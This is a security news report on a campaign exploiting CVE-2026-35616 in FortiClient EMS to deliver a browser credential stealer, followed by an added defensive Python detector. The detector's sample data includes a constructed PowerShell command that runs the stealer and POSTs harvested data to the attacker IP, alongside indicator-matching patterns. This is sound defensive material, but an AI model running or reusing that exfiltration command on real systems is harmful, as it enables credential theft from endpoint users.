Cybercriminals are actively exploiting a critical vulnerability in Fortinet’s FortiClient Endpoint Management Server (EMS) to distribute potent credential-stealing malware. This ongoing campaign, first observed in May 2026, leverages trusted endpoint management infrastructure to compromise numerous devices, disguising malicious payloads as legitimate Fortinet updates. The exploitation of this critical pre-authentication API access bypass, identified as CVE-2026-35616, allows attackers to escalate privileges and gain unfettered access to managed endpoints.
The severity of CVE-2026-35616, which carries a CVSS score of 9.1, lies in its ability to bypass authentication mechanisms before any user interaction. Fortinet has since released patches for this vulnerability in FortiClient EMS versions 7.4.7 and later. However, organizations that have not yet updated their systems remain vulnerable to this sophisticated attack vector. The widespread use of FortiClient EMS by enterprises makes this a significant threat to corporate data security.
Exploiting FortiClient EMS for Credential Theft
Following a successful initial compromise, threat actors are manipulating FortiClient EMS configurations. According to cybersecurity firm Arctic Wolf, which detailed the campaign, attackers modify settings to delay firmware upgrade notifications and alter Remote Access Profile configurations. This strategic alteration enables them to insert malicious scripts into endpoint policies, ensuring the execution of harmful code on unsuspecting managed devices.
The observed execution pattern indicates a calculated approach by the threat actors. They are effectively using FortiClient’s own management channels to push malicious PowerShell commands. This method makes the malicious operations appear as routine management activities, thereby evading detection by security teams. Once control of the EMS is established, every endpoint under its management becomes a potential target, circumventing the need for individual intrusion attempts on each device.
The Mechanics of the Attack
The attack chain involves a legitimate FortiClient executable, “fortitray.exe,” which is used to launch a command script (.cmd file) via “cmd.exe.” This script, in turn, executes a Base64-encoded PowerShell script. The primary function of this PowerShell script is to download a malicious payload, execute it, and then exfiltrate the stolen data to an attacker-controlled server located at “83.138.53[.]110” using an HTTP POST request.
The downloaded malicious executable, identified as “FortiEndpoint_Patch.exe,” is designed to mimic a genuine FortiClient update. However, it is a previously unreported Windows information stealer. This malware is capable of harvesting sensitive data from popular Chromium- and Gecko-based browsers. This includes user credentials such as passwords, session cookies, and autofill information, which can encompass credit card details, personal addresses, and phone numbers.
The stolen data is initially logged to a file within the ProgramData directory before being transmitted. It is crucial to note that the stealer itself lacks direct network exfiltration capabilities, relying instead on the accompanying PowerShell script for outbound communication to the threat actor’s infrastructure. This layered approach makes attribution and disruption more challenging.
Implications of the Vulnerability and Malware
By bypassing API authentication and leveraging privileged access within the EMS, threat actors gain the ability to alter critical management configurations. This allows them to push malicious scripts that are then executed on managed endpoints, potentially impacting thousands of devices simultaneously. The ability to manipulate management configurations, as highlighted by Arctic Wolf’s analysis, represents a significant departure from typical endpoint compromises.
The exfiltrated session cookies and saved browser credentials pose a severe risk for follow-on attacks. Threat actors can use this information to gain unauthorized access to cloud services, internal applications, and other authenticated systems. In some instances, the reuse of session cookies may even bypass multi-factor authentication (MFA) prompts, further extending the attackers’ reach and impact. Organizations are strongly advised to prioritize patching their FortiClient EMS deployments to mitigate this critical security risk.
The immediate next step for organizations is to ensure their FortiClient EMS environments are updated to version 7.4.7 or later. Security teams should also conduct thorough investigations for any signs of compromise, particularly looking for unusual configuration changes within their EMS deployments and evidence of the described PowerShell scripts or the “FortiEndpoint_Patch.exe” executable on managed endpoints. Continued monitoring for suspicious network activity targeting the identified IP address will also be crucial in the coming weeks.
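As an added defender-side example (not code from the article, Fortinet or Arctic Wolf), the Python below applies the process lineage and indicators described above to process-creation records: it looks for the fortitray.exe to cmd.exe (.cmd) to powershell.exe chain, decodes the Base64 PowerShell command line, and checks it for the published C2 address and stealer file name. The record fields, file paths, PIDs and the sample events are constructed for illustration.

```python
import base64
import re

# Indicators quoted in the article; the IP is refanged only for matching.
C2_IP = "83.138.53[.]110".replace("[.]", ".")
STEALER_NAME = "fortiendpoint_patch.exe"

def encode_ps(script):  # what PowerShell's -EncodedCommand expects: UTF-16LE, base64
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand (-enc / -e) payload, or '' if absent or malformed."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else ""
    except (ValueError, UnicodeDecodeError):
        return ""

def analyse(events):
    """Flag powershell.exe launches matching the described lineage or payload indicators."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if not e["image"].lower().endswith("powershell.exe"):
            continue
        parent = by_pid.get(e["ppid"])
        grandparent = by_pid.get(parent["ppid"]) if parent else None
        reasons = []
        # Lineage from the article: fortitray.exe -> cmd.exe running a .cmd -> powershell.exe
        if (parent and grandparent and parent["image"].lower().endswith("cmd.exe")
                and re.search(r"\.cmd\b", parent["cmdline"], re.I)
                and grandparent["image"].lower().endswith("fortitray.exe")):
            reasons.append("fortitray.exe -> cmd.exe (.cmd) -> powershell.exe lineage")
        decoded = decode_encoded_command(e["cmdline"])  # inspect the Base64 script itself
        if C2_IP in decoded:
            reasons.append("decoded payload references " + C2_IP)
        if STEALER_NAME in decoded.lower():
            reasons.append("decoded payload references " + STEALER_NAME)
        if reasons:
            findings.append({"pid": e["pid"], "reasons": reasons})
    return findings
# Constructed sample process-creation records (paths and PIDs are made up, not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Fortinet\FortiClient\fortitray.exe", "cmdline": "fortitray.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd.exe /c C:\ProgramData\update.cmd"},
    {"pid": 300, "ppid": 200, "image": PS, "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_ps(
        r'& "$env:ProgramData\FortiEndpoint_Patch.exe"; Invoke-WebRequest -Uri http://83.138.53.110/ -Method POST -InFile "$env:ProgramData\log.txt"')},
    {"pid": 500, "ppid": 1, "image": PS, "cmdline": "powershell.exe -EncodedCommand " + encode_ps("Get-Date")},
]
```

Running `analyse(SAMPLE_EVENTS)` flags only PID 300, with all three reasons; the benign encoded `Get-Date` launch is left alone.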